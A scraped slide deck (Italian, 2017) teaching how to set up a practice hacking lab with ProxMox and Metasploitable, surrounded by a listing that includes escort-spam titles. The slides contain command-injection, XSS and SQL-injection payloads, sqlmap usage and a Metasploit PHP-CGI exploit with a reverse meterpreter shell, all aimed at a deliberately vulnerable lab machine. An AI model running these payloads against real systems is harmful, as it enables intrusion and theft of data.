A Year of the Servo Reboot: Where Are We Now?Igalia
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 

Dernier (20)

GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 

Hacking Lab con ProxMox e Metasploitable

  • 1. Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna HACKING LAB con ProxMox e Metasploitable
  • 2. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna $ whoami Phishing Analysis and Contrast @ D3Lab Team Member @ BackBox Linux
  • 3. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Hacking Lab Un laboratorio nella propria infrastruttura di rete per allenarsi in assoluta legalità sulle tecniche sfruttate nel Hacking.
  • 4. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna ProxMox Proxmox VE is a complete open source server virtualization management software. It is based on KVM virtualization and container-based virtualization and manages KVM virtual machines, Linux containers (LXC), storage, virtualized networks, and HA clusters www.proxmox.com
  • 5. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Metasploitable Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. https://sourceforge.net/projects/metasploitable/
  • 6. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. BackBox desktop environment includes a complete set of tools required for ethical hacking and security testing. BackBox Linux backbox.org
  • 7. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable Creiamo una nuova Macchina Virtuale dal Pannello Web Ricordatevelo
  • 8. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  • 9. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  • 10. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  • 11. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  • 12. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  • 13. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  • 14. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable $ ssh root@IP_PROXMOX # cd /var/lib/vz/images
 # mkdir 102 (ID del VM che abbiamo prima creato) # cd 102
 # wget http://bit.ly/metasploitable -O metasploitable.zip
 # unzip metasploitable.zip # cd Metasploitable2-Linux/ # mv Metasploitable.vmdk ../ # rm metasploitable.zip ./Metasploitable2-Linux/ -rf
  • 15. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable # qemu-img convert -f vmdk Metasploitable.vmdk -O qcow2 …Metasploitable.qcow2 # nano /etc/pve/qemu-server/102.conf
  • 16. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable bootdisk: ide0 ide0: file=local:102/Metasploitable.qcow2,size=8G
  • 17. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable Avviamo la VM
  • 18. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable https://youtu.be/WBsCOjRQKnI
  • 19. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: nmap $ nmap 192.168.x.x Starting Nmap 7.01 ( https://nmap.org ) Nmap scan report for 192.168.2.128 Host is up (0.0071s latency). Not shown: 977 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec 513/tcp open login 514/tcp open shell 1099/tcp open rmiregistry 1524/tcp open ingreslock 2049/tcp open nfs 2121/tcp open ccproxy-ftp 3306/tcp open mysql 5432/tcp open postgresql 5900/tcp open vnc 6000/tcp open X11 6667/tcp open irc 8009/tcp open ajp13 8180/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
  • 20. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: nmap $ sudo nmap -o 192.168.x.x Starting Nmap 7.01 ( https://nmap.org ) Nmap scan report for 192.168.2.128 Host is up (0.0071s latency). Not shown: 977 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec … … … Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.24 - 2.6.25 Network Distance: 2 hops Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
  • 21. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Zenmap $ sudo zenmap
  • 22. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Dirsearch $ dirsearch -e php -u http://192.168.x.x [22:30:01] 200 - 112KB - /doc/ [22:30:01] 302 - 0B - /dvwa/ -> login.php [22:30:03] 200 - 891B - /index.php [22:30:05] 200 - 24KB - /mutillidae/ [22:30:05] 200 - 4KB - /phpMyAdmin/ [22:30:06] 200 - 48KB - /phpinfo.php [22:30:07] 403 - 300B - /server-status/ [22:30:08] 200 - 884B - /test/
  • 23. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA http://192.168.x.x/dvwa/ admin:password
  • 24. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA Command Execution Low 192.168.2.1 ; cat /etc/passwd
  • 25. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA Command Execution Medium 192.168.2.1 & cat /etc/passwd
  • 26. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA XSS Reflected Low <script>alert('Hello World')</script>
  • 27. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA XSS Reflected Medium <ScRiPt>alert('Hello World’)</script> <script language="javascript">alert('Hello World’)</script> <img src=x onerror="alert('Hello World')">
  • 28. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA XSS Stored Low <script>document.write(document.cookie)</script> <iframe src=“http://www.makerstation.it/"></iframe> <meta http-equiv="refresh" content="10; url=http:// www.makerstation.it/">
  • 29. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA XSS Stored Medium <ScRiPt>alert("Hello World 2")</script>
  • 30. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA SQL Injection Low ' or '0'='0 ' or '0'='0' union select null, version() # ' or '0'='0' union select null, database() #
  • 31. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA SQL Injection Low and SQLMap sqlmap -u "http://192.168.x.x/dvwa/vulnerabilities/sqli/" -- forms --cookie="security=low; PHPSESSID=xyz"
  • 32. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA SQL Injection Medium 0 or 1=1
  • 33. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Whatweb $ whatweb 192.168.x.x [200] Apache[2.2.8], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) DAV/2], IP[192.168.x.x], PHP[5.2.4-2ubuntu5.10], Title[Metasploitable2 - Linux], WebDAV[2], X-Powered- By[PHP/5.2.4-2ubuntu5.10] $ nmap -sV --script=http-php-version 192.168.x.x |_Version from header x-powered-by: PHP/5.2.4-2 |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
  • 34. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Metasploit $ sudo metasploit # search CVE-2012-1823 # use exploit/multi/http/php_cgi_arg_injection # show options # set RHOST 192.168.x.x
 # set PAYLOAD php/meterpreter/reverse_tcp # exploit
  • 35. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Armitage
  • 36. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Q&A @AndreaDraghetti